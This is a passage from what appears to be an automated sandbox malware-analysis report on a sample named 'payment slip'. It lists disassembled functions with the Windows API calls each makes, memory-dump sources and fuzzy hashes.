                                        • CoTaskMemFree.OLE32(?), ref: 000B4DDA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                        • String ID: NULL Pointer assignment
                                        • API String ID: 614568839-2785691316
                                        • Opcode ID: 2bcf6baee4b2c58d648ead20f2068889aac64a7aaf28c5e8d9c87f943adeb85d
                                        • Instruction ID: 4cd38c0c8ed095859b41ef12860eb408c74b2d809695baaafad255ebe0fe0ffa
                                        • Opcode Fuzzy Hash: 2bcf6baee4b2c58d648ead20f2068889aac64a7aaf28c5e8d9c87f943adeb85d
                                        • Instruction Fuzzy Hash: E5910571D00219AFDF15DFA4C891EEEB7B9BF48310F10816AE919A7252DB749A44CFA0
                                        Function 000C20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetMenu.USER32(?), ref: 000C2183
                                        • GetMenuItemCount.USER32(00000000), ref: 000C21B5
                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 000C21DD
                                        • _wcslen.LIBCMT ref: 000C2213
                                        • GetMenuItemID.USER32(?,?), ref: 000C224D
                                        • GetSubMenu.USER32(?,?), ref: 000C225B
                                          • Part of subcall function 00093A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00093A57
                                          • Part of subcall function 00093A3D: GetCurrentThreadId.KERNEL32 ref: 00093A5E
                                          • Part of subcall function 00093A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000925B3), ref: 00093A65
                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 000C22E3
                                          • Part of subcall function 0009E97B: Sleep.KERNEL32 ref: 0009E9F3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                        • String ID:
                                        • API String ID: 4196846111-0
                                        • Opcode ID: fc975d1f49ffa10ced865a34f54caa4b18a87bc57ea6a472ec1d6080b6f55647
                                        • Instruction ID: 6acb90261540b76171d7643eb411b54bd7f652f45886609ec08061fcbae07421
                                        • Opcode Fuzzy Hash: fc975d1f49ffa10ced865a34f54caa4b18a87bc57ea6a472ec1d6080b6f55647
                                        • Instruction Fuzzy Hash: 84716C75A00205AFDB15EFA4C845FAEB7F5EF48310F14846DE81AEB752DB34AE418B90
                                        Function 0009AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetParent.USER32(?), ref: 0009AEF9
                                        • GetKeyboardState.USER32(?), ref: 0009AF0E
                                        • SetKeyboardState.USER32(?), ref: 0009AF6F
                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 0009AF9D
                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 0009AFBC
                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 0009AFFD
                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0009B020
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        • Opcode ID: 70d12ae81cba0e39a921ef8510c574cac90c996b6a8658599eb102a05ec356fc
                                        • Instruction ID: 0e13629705a38a930f69e8bbc1b842666b13620a744b83b577f27c1db84b0108
                                        • Opcode Fuzzy Hash: 70d12ae81cba0e39a921ef8510c574cac90c996b6a8658599eb102a05ec356fc
                                        • Instruction Fuzzy Hash: A951DFA0A047D53DFF368374CD59BBABEE95B06314F088499E1E9458C3C398A8C8E791
                                        Function 0009ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetParent.USER32(00000000), ref: 0009AD19
                                        • GetKeyboardState.USER32(?), ref: 0009AD2E
                                        • SetKeyboardState.USER32(?), ref: 0009AD8F
                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0009ADBB
                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0009ADD8
                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0009AE17
                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0009AE38
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        • Opcode ID: 4f6cf34f0c11ff043fb7a3eb65db32e97cf1547919b5c3012f9d66d7785e4f5a
                                        • Instruction ID: 9a8ce4a993447c4808671d049b3f6fc21ebdc6990d0999d53c26849d815cf942
                                        • Opcode Fuzzy Hash: 4f6cf34f0c11ff043fb7a3eb65db32e97cf1547919b5c3012f9d66d7785e4f5a
                                        • Instruction Fuzzy Hash: A551B6A1A057D53DFF3683348C55BBA7ED95B47300F088589E1D6468C3D694EC84F7A2
                                        Function 0006542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetConsoleCP.KERNEL32(00073CD6,?,?,?,?,?,?,?,?,00065BA3,?,?,00073CD6,?,?), ref: 00065470
                                        • __fassign.LIBCMT ref: 000654EB
                                        • __fassign.LIBCMT ref: 00065506
                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00073CD6,00000005,00000000,00000000), ref: 0006552C
                                        • WriteFile.KERNEL32(?,00073CD6,00000000,00065BA3,00000000,?,?,?,?,?,?,?,?,?,00065BA3,?), ref: 0006554B
                                        • WriteFile.KERNEL32(?,?,00000001,00065BA3,00000000,?,?,?,?,?,?,?,?,?,00065BA3,?), ref: 00065584
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 1324828854-0
                                        • Opcode ID: 0e0e73682c3d7277856a4cd84a869dba7bdc2b47f3cb60f646c84791b567f5ec
                                        • Instruction ID: 903f0b1c0a15e235267dc5133c67e7fa48868f69db26e08795fce502499da723
                                        • Opcode Fuzzy Hash: 0e0e73682c3d7277856a4cd84a869dba7bdc2b47f3cb60f646c84791b567f5ec
                                        • Instruction Fuzzy Hash: 7151B170A007499FDB11CFA8DC59AEEBBFAEF09301F14415AF956E7291D6309A41CB60
                                        Function 000C6B76 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 131windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowLongW.USER32(00000002,000000F0,?), ref: 000C6C33
                                        • SetWindowLongW.USER32(?,000000EC,?), ref: 000C6C4A
                                        • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 000C6C73
                                        • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,000AAB79,00000000,00000000), ref: 000C6C98
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 000C6CC7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$Long$MessageSendShow
                                        • String ID: U
                                        • API String ID: 3688381893-2399391058
                                        • Opcode ID: 2f616260564b1691130adde79e24eb1192074ffcfb0b3362d39e6aa08be2cc35
                                        • Instruction ID: c3c5ff4a7c6dab513f0d076fdea1f27a5529048c23246c3e689f2f67d8e17045
                                        • Opcode Fuzzy Hash: 2f616260564b1691130adde79e24eb1192074ffcfb0b3362d39e6aa08be2cc35
                                        • Instruction Fuzzy Hash: A741AF35A04104AFEB34CF68CD99FBD7BE5EB09350F14022CF899A72A1C372AD41DA80
                                        Function 00052D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                        Download Yara Rule
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 00052D4B
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00052D53
                                        • _ValidateLocalCookies.LIBCMT ref: 00052DE1
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00052E0C
                                        • _ValidateLocalCookies.LIBCMT ref: 00052E61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: 1149645a6002ec1dd9695e1bbc38bfbb1220038b0af48d4af4e248001699f604
                                        • Instruction ID: 1e9e557dd8ccd925e56feb4d297d92846c57602b8fae30ac730abbdeca22916c
                                        • Opcode Fuzzy Hash: 1149645a6002ec1dd9695e1bbc38bfbb1220038b0af48d4af4e248001699f604
                                        • Instruction Fuzzy Hash: 3F419634E002099BCF14DF68C845AEFBBF5BF46356F148155ED146B352DB35AA09CBA0
                                        Function 000B10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000B304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 000B307A
                                          • Part of subcall function 000B304E: _wcslen.LIBCMT ref: 000B309B
                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 000B1112
                                        • WSAGetLastError.WSOCK32 ref: 000B1121
                                        • WSAGetLastError.WSOCK32 ref: 000B11C9
                                        • closesocket.WSOCK32(00000000), ref: 000B11F9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                        • String ID:
                                        • API String ID: 2675159561-0
                                        • Opcode ID: d6ab2eda3ba5c149e6fc4915bd01e4360ce83fd9a71adcc9a03fa9309c532fd9
                                        • Instruction ID: c38a939d079140a84f6df5a2b446483fd668b3fb2530a326c63eca0d53f7595f
                                        • Opcode Fuzzy Hash: d6ab2eda3ba5c149e6fc4915bd01e4360ce83fd9a71adcc9a03fa9309c532fd9
                                        • Instruction Fuzzy Hash: DF410331600604AFEB109F18C894FEABBE9EF45324F548559FD19AB292C774ED41CBE0
                                        Function 0009CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0009DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0009CF22,?), ref: 0009DDFD
                                          • Part of subcall function 0009DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0009CF22,?), ref: 0009DE16
                                        • lstrcmpiW.KERNEL32(?,?), ref: 0009CF45
                                        • MoveFileW.KERNEL32(?,?), ref: 0009CF7F
                                        • _wcslen.LIBCMT ref: 0009D005
                                        • _wcslen.LIBCMT ref: 0009D01B
                                        • SHFileOperationW.SHELL32(?), ref: 0009D061
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                        • String ID: \*.*
                                        • API String ID: 3164238972-1173974218
                                        • Opcode ID: a4092acd6574b36e86b78ec00d555fde9eaa22f1660223ec15b4c6ca205666c7
                                        • Instruction ID: 1bf9bec96affcc041397733c8b09d082c3c8390f88500718f4a5f05c53052399
                                        • Opcode Fuzzy Hash: a4092acd6574b36e86b78ec00d555fde9eaa22f1660223ec15b4c6ca205666c7
                                        • Instruction Fuzzy Hash: 90414871D451185FEF52EBA4D991EDEB7F9AF44380F1000E6E509EB142EA34AB48DB50
                                        Function 00097726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00097769
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0009778F
                                        • SysAllocString.OLEAUT32(00000000), ref: 00097792
                                        • SysAllocString.OLEAUT32(?), ref: 000977B0
                                        • SysFreeString.OLEAUT32(?), ref: 000977B9
                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 000977DE
                                        • SysAllocString.OLEAUT32(?), ref: 000977EC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                        • String ID:
                                        • API String ID: 3761583154-0
                                        • Opcode ID: 4646a9320a11c97dd84d00bf89f2094b95a2183d7281dcef455a541d19b5f230
                                        • Instruction ID: 9c6a1ab7598dfa00514371d9415759930cbe89a353e86a6cb9e8f5d5b9f75743
                                        • Opcode Fuzzy Hash: 4646a9320a11c97dd84d00bf89f2094b95a2183d7281dcef455a541d19b5f230
                                        • Instruction Fuzzy Hash: 0A21C176608219AFEF10DFE9CC88CBBB3ECEB093647048025FA08DB2A1D674DC419764
                                        Function 000977FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00097842
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00097868
                                        • SysAllocString.OLEAUT32(00000000), ref: 0009786B
                                        • SysAllocString.OLEAUT32 ref: 0009788C
                                        • SysFreeString.OLEAUT32 ref: 00097895
                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 000978AF
                                        • SysAllocString.OLEAUT32(?), ref: 000978BD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                        • String ID:
                                        • API String ID: 3761583154-0
                                        • Opcode ID: 0d05d060b40d68d3ba46d7204efbea75cac6de38bba49924f493949fa1e42a40
                                        • Instruction ID: 3ec5d8334ab16ec2b8fe63b24c959483560347105ae335d51537664b38bfd459
                                        • Opcode Fuzzy Hash: 0d05d060b40d68d3ba46d7204efbea75cac6de38bba49924f493949fa1e42a40
                                        • Instruction Fuzzy Hash: 6A219D72608204AFEF14AFA8DC88DBB77ECEB093607148125F919CB2A1DA74DC41DB74
                                        Function 000A04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetStdHandle.KERNEL32(0000000C), ref: 000A04F2
                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 000A052E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CreateHandlePipe
                                        • String ID: nul
                                        • API String ID: 1424370930-2873401336
                                        • Opcode ID: e144bd6d780e7ef6f0fc94277ea3199f98446d3a755097ff66441de1647f0007
                                        • Instruction ID: c31d0442ae92182ce482e477d017adb979fc7b9bc52a6f1e67813b4b16bdfb05
                                        • Opcode Fuzzy Hash: e144bd6d780e7ef6f0fc94277ea3199f98446d3a755097ff66441de1647f0007
                                        • Instruction Fuzzy Hash: C6217E71900709EBEB209FB9DC44E9A7BF4AF46764F204A19F8A1D62E0D7709950CF20
                                        Function 000A05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F6), ref: 000A05C6
                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 000A0601
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CreateHandlePipe
                                        • String ID: nul
                                        • API String ID: 1424370930-2873401336
                                        • Opcode ID: 67cdbf6b46208c2c6ba1758bc2ac29968dd10161cc63a1d17963a569cb3fc2dc
                                        • Instruction ID: 590ca99bbc5f86c3c49170d3cb99760c2994cfaef040392aa4818c8403bdca32
                                        • Opcode Fuzzy Hash: 67cdbf6b46208c2c6ba1758bc2ac29968dd10161cc63a1d17963a569cb3fc2dc
                                        • Instruction Fuzzy Hash: 042135755003099BEB209FA9DC44E9A77E8BF96728F200B19F9A1E72D0D7719960CB50
                                        Function 000C40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0003600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0003604C
                                          • Part of subcall function 0003600E: GetStockObject.GDI32(00000011), ref: 00036060
                                          • Part of subcall function 0003600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0003606A
                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 000C4112
                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 000C411F
                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 000C412A
                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 000C4139
                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 000C4145
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend$CreateObjectStockWindow
                                        • String ID: Msctls_Progress32
                                        • API String ID: 1025951953-3636473452
                                        • Opcode ID: b6d360d942ae8071314a768e4125bc3af8d3de8dfdd1c03914a7a04513614adf
                                        • Instruction ID: 35d41f8b36995bb076711ad51b869363f17d3618c1969f07ed116030ce73e82c
                                        • Opcode Fuzzy Hash: b6d360d942ae8071314a768e4125bc3af8d3de8dfdd1c03914a7a04513614adf
                                        • Instruction Fuzzy Hash: 1F1190B2140219BEFF218F64CC86EEB7F9DFF08798F008111FB58A6050C6769C619BA4
                                        Function 0006D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0006D7A3: _free.LIBCMT ref: 0006D7CC
                                        • _free.LIBCMT ref: 0006D82D
                                          • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
                                          • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
                                        • _free.LIBCMT ref: 0006D838
                                        • _free.LIBCMT ref: 0006D843
                                        • _free.LIBCMT ref: 0006D897
                                        • _free.LIBCMT ref: 0006D8A2
                                        • _free.LIBCMT ref: 0006D8AD
                                        • _free.LIBCMT ref: 0006D8B8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
